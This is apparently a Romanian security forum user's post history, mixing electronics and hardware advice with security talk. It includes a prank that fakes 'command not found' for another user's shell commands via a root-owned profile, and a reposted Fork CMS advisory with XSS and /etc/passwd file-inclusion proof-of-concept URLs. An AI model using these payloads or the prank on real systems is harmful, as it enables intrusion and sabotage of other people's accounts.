backdoor

Nice idea ussing new Images. How quick does the browser dies with this method ? Also you can use 1 iframe 1x1 px and control the src value to send the requests.

verde_888 Electromagnetul de pe gaz. Daca vorbesti de ala care este afara langa contor : Nu sta anclansat. Detectorul de gaz ii da comanda cand sa anclanseze si are un sistem mecanic care il tine anclansat pana te duci afara si tragi de tumburuc. Daca vb de alta pesa nu stiu.... In principiu nu se lucreaza cu el anclansat tocmai din motiv ca se incinge. Si la UPS , releul e picat in conditii normale si sta anclansat doar 10-60 min pana se termina bateria la UPS sau revine curentul.

Daca vreti sa faceti misto de un regular user , punetii asta in profil si chimbati ownership cu root:root si file atribute 0600 ; Usefull administration commands alias ifconfig="echo $1 error fetching interface information: Device not found" alias iptables="echo Try `iptables -h' or 'iptables --help' for more information." alias w="echo -bash: w: command not found" alias whoami="echo Un bou" alias last="echo -bash: last: command not found" alias netstat="echo -bash: netstat: command not found" alias lsmod="echo -bash: lsmod: command not found" alias insmod="echo -bash: insmod: command not found" alias uname="echo -bash: uname: command not found" alias su="echo -bash: su: command not found" alias sudo="echo -bash: sudo: command not found" ; Editors alias mc="echo -bash: mc: command not found" alias mcedit="echo -bash: mcedit: command not found" alias vi="echo -bash: vi: command not found" alias pico="echo -bash: vi: command not found" ; Editors util alias cat="echo -bash: cat: command not found" alias awk=""echo -bash: awk: command not found" alias grep="echo -bash: grep: command not found" Sigur o sa ii ia un pic sa se prinda ce naiba se intampla pyth0n3 eu zic sa te apuci sa iti scrii propriul shell , eventual bazat pe python.

Fork CMS version 3.2.4 suffers from cross site scripting and local file inclusion vulnerabilities. ########################################################################################################################## # Exploit Title: Fork CMS v.3.2.4 - Multiple Vulnerabilities # Script Page : http://www.fork-cms.com # Date: 11-02-2012 # Author : RandomStorm - http://www.randomstorm.com # Avram Marius Gabriel (d3v1l) # Tested on: Windows XP & Vista ########################################################################################################################## # Reflected Cross-Site Scripting (XSS) on Admin Panel # POC: # http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script> # http://site.com/users/index?token=true&error=</script><script>alert(1)</script> ########################################################################################################################### # Local File Inclusion ( LFI ) # POC: # http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en ########################################################################################################################## # About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website. ########################################################################################################################### Sursa : Fork CMS 3.2.4 Cross Site Scripting / Local File Inclusion Merge bine daca open_base_dir nu e setat cum trebuie si php ruleaza cu mod_php (adica cu user apache/www) .

1. Sqlmap suporta si parametri . Nu are rost sa faci test de MSSQL cand tu stii sigur ca e mysql. 2. Pe BackTrack ai si uptiune de update.

Ai gasit din greseala si x64 ca ma pasiona sa fac un test PT cei interesati de shell code un tutorial : how-to-create-polymorphic-shellcode.txt

BackZtage CMS suffers from shell upload and remote SQL injection vulnerabilities. Sursa: BackZtage CMS Shell Upload / SQL Injection Recomand SQLMAP pt testing ...

The_Arhitect eu cred ca tu incepi sa ma placi da nu stii cum sa mi-o zici. Proababil personalitatea ta e foarte puternica.... Nytro Stiu ca nu e acelasi lucru. Un script de genu asta implica sa ai cel putin ftp access pe server . Si pana la urma la ce iti foloseste sa ii tot pici serverul aluia ? Oricum nu il rupi prea tare pt ca mod_php nu se mai foloseste de ceva timp. Plus ca adminul poate sa vada ce process ii rupe serverul si iti rade aplicatia. Sincer Domnule arhitect nu vad la ce ar folosi.

This Metasploit module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3. Sursa: Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow ? Packet Storm

The_Arhitect Nu te supara ca iti zic, Copy paste stie sa face multa lume. In primul si in primul rand, daca te uiti tu mai bine , fiserul tau este un script php ... Care ce face ? Local DOS ? HAHAHA ... ASTA POTI SA FACI SI cu un while(); Daca nu am dreptate lumineaza-ma ! Te rog !

Ce dragut din partea lor. Poate fac ei vreo smekerie sa ruleze pe 8 biti ca sa aiba de 4 ori mai mult ram.... CA (certificate authority) te forteaza sa downloadezi CLR odata pe saptamana. Deci pana la urma browserul tau tot afla odata si odata ca certificatul ala a expirat. EM CLR check nu se face la fiecare accesare , ci cand se instantiaza sesiunea SSL . Nu e neaparat o chestie de viteza, ci chipurile o economie de traffic . Cu criza asta pana si Google a inceput sa se gandeasca ca se termina Internetul.

Mda cu siguranta este ceva mai bun decat Nod32. Chiar daca e gratis , KAV 2011 are cateva chestii neplacute : 1. Detection engine da o groaza de false positive alerts. 2. Dupa 2-3 luni de update-uri , banuiesc ca se cam zapaceste baza de date cu definitii si incepe sa se comporte cam ciudat. 3. Papa ceva mai multa memorie decat 2012. 4. Deja a aparut 2012 , oferta asta e ca programul rabla. Oricum , fiind oferit gratuit se merita , chiar si cu o reinstalare de windows dupa 6 luni. Altii il instaleaza mult mai des.

LegendKiller Iti dau eu solutia: Cumpara-ti alt UPS !

rimagheo Adevarul e ca desenezi frumos in paint Pe de alta parte nici LegendKiller nu a putut sa ne zica ce vrea exact sa faca ... ii e frica ca intra aia de la electrica pe forum si vin la el acasa.... Pe de alta parte rimagheo schema ta o sa ia foc dupa cateva zile bune ca releul ala sta anclansat mereu si se va incalzi din ce in ce mai tare pana face fsss.... Birkoff da poate omu e prea sarac sa isi permita un UPS, si la 20w cred ca de fapt e un kkt de transformator de la un router sau cine stie ce access point si cel mai simplu era sa puna o baterie de 12v.

Petzy Tex are dreptate , Cardul ala e RFID iar modelele mai vechi sunt niste cartele cu un cod de bare. SticKyWoX Ai incercat sa dai cu capul ? Ia vezi ca altora le-a iesit .... In primul rand interfonul ala e facut sa reziste la intemperii , ca dupa cum observi se monteaza la intrarea in scara , nu in dulapul cu haine din dormitor de la tine. In al doilea rand cand le proiecteaza se gandesc cum sa le protejeze de factorul extern . Exemplu : demontare, socuri electrice si/sau mecanice. In al treilea rand se respecta niste standarde ISO de calitate. Cum ar fi sa vii acasa si sa vezi ca lipseste tasta 3 si cumea tu stai la apartamentul 23 ? Ce faci ? jojo123 Asa o fi , nu te contrazic. Da spune si mie cat de BOU trebuie sa fie ala care l-a instalat sa nu ii schimbe codul de programare ? Adica tu iti pui Cod pin 0000 la telefon si crezi ca esti in siguranta ?

RyukClau - daca vorbeai despre un desktop era simpla treaba , Placa de baza poti sa cauti pe ebay/amazon dupa PART NUMBERUL placii ... In fine ieftina si noua : sweet dreams ! Noua poti sa iei doar Fujitsu si cu siguranta nu o sa fie ieftina. Ieftina poti sa o iei de la un combinatorist .... stii tu , daia de aduc laptoape din Spania,Italia si nu au incarcator ... Mai exact ideal ar fi sa gasesti un laptop ca al tau cu alt defect , LCD spart... HDD lipsa... si faci din doua unu... Acum tu stii mai bine ce rasnita de laptop e ala si daca merita banii sa il faci . Cel mai simplu iti achizitionezi unu nou....

hit47 poti sa pui ce baterie vrea muschiu tau, numai ca o sa ai o singura mica problema , Daca te duci cu capacitate/puterea bateriei prea sus , dupa o pana de curent o sa iti ia foc UPS'ul pt ca nu are suficienta putere sa incarce bateria/bateriile. Orice circuit electronic , inclusiv mizeriile pe care le vand chinezii sunt proiectate si testate pana la cele mai mici detalii. Daca tu schimbi parametrii de functionare o sa il defectezi pana la urma. tex 1200VA , la 12v inseamna un consum de 100Ah . Tu ai pus baterii de 200Ah , adica ar trebui sa te tina dublu fata de cat tinea cu bateria originala , Doar ca timpul de incarcare pana la capacitatea maxima se cam tripleaza fata de cel initial.... Sincer Mi se pare fabulos 20 ore ... Ce configuratie sunt serverele ? Intel Atom ? hit47 : Cumpara-ti un Generator pe benzina , ca UPS'ul te tine suficient cat sa il poti porni

Pai ma Ben , da tu nu vezi ca est user "chior" . Arde-o si tu cu inainte ... sau

Da foarte dragut utilitarul , singura problema este ca ... eu nu mi-as lasa clear password in niste scripturi pe server , mai ales ca parolele sunt de la alte remote hosts.... Oricum bine de tinut minte....

Nu chiar cum a zis colegul Cril , ca o sa iti dea o eroare frumoasa in while dupa close (MYFILE); in mod normal ar trebui sa mearga:) De fapt trebuie sa iesi din bucla While , si asta o faci cu linia last; Off....

Ma acuma serios , 0day am inteles , dar un link cu o mizerie de anunt puteam sa gasesc si eu. Alte detalii despre exploit ? PS: Pt jmekerii cu remote exploit 1. /etc/my.cnf [mysqld] skip-networking 2. iptables -F INPUT iptables -P ACCEPT iptables -A INPUT -i eth0 -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A INPUT -i eth0 -p tcp -s truested_net/24 -m state --state NEW -j ACCEPT iptables -A INPUT -i eth0 -j DROP mod_mysql din PHP se leaga pe /tmp/mysql.sock sau /var/lib/mysql/mysql.sock daca in conexiunea de mysql nu specificati portul. Acelasi lucru si cu PERL sau orice alt limbaj folosit pe serverele de Hosting. Mai mult de atat UNIX sockets este mai rapid decat TCP/IP ... Daca aveti nevoie sa va legati la MYSQL , si considerati ca phpMyAmin nu este suficient pt activitatile zilnice va recomand OpenVPN sau SSH tunneling ... PS: Pt cei care ruleaza Mysql pe Windows ... sincer: Imi pare rau !

Pugna eu zic sa nu il pornesti de loc . Asa in cel mai bun caz o sa iti intre praful in el

CentOS release 5.6 (Final) Linux UNSERVER 2.6.18-238.12.1.el5 CentOS release 5.7 (Final) Linux ALTSERVER 2.6.18-274.7.1.el5 CentOS release 6.2 (Final) Linux HALTSERVER 2.6.32-220.4.1.el6.x86_64 E clar , versiunile de centos mai vechi nu au vulnerabilitatea asta (am testat personal pe Centos 5.7) .... Si cu siguranta pana ajunge CentOS 6 la 2.3.39 mai dureaza si or sa apara patchuri care vor repara problema asta si vor cauza altele .... Exact ca Service Pack la Microsoft Cheater

Din pacate cred ca au rezolvat deja bug-ul ... inceaca pe DevSlide's Online Support System - Powered by swDesk v1.2

Ori e ARP ori e TCP ??? Oricum din cate mai stiu si eu perl , e pur si simplu un simple ARP poisoner cu RANDOM mac address. Da tex, ar trebui sa incerci sa ataci GW-ul si sa vezi daca mai ai net pe calculatoarele din lan.... Direct attack catre masina BSD , in cel mai bun caz iti da o caruta de mesaje ca un alt host iti foloseste ip'ul in logs.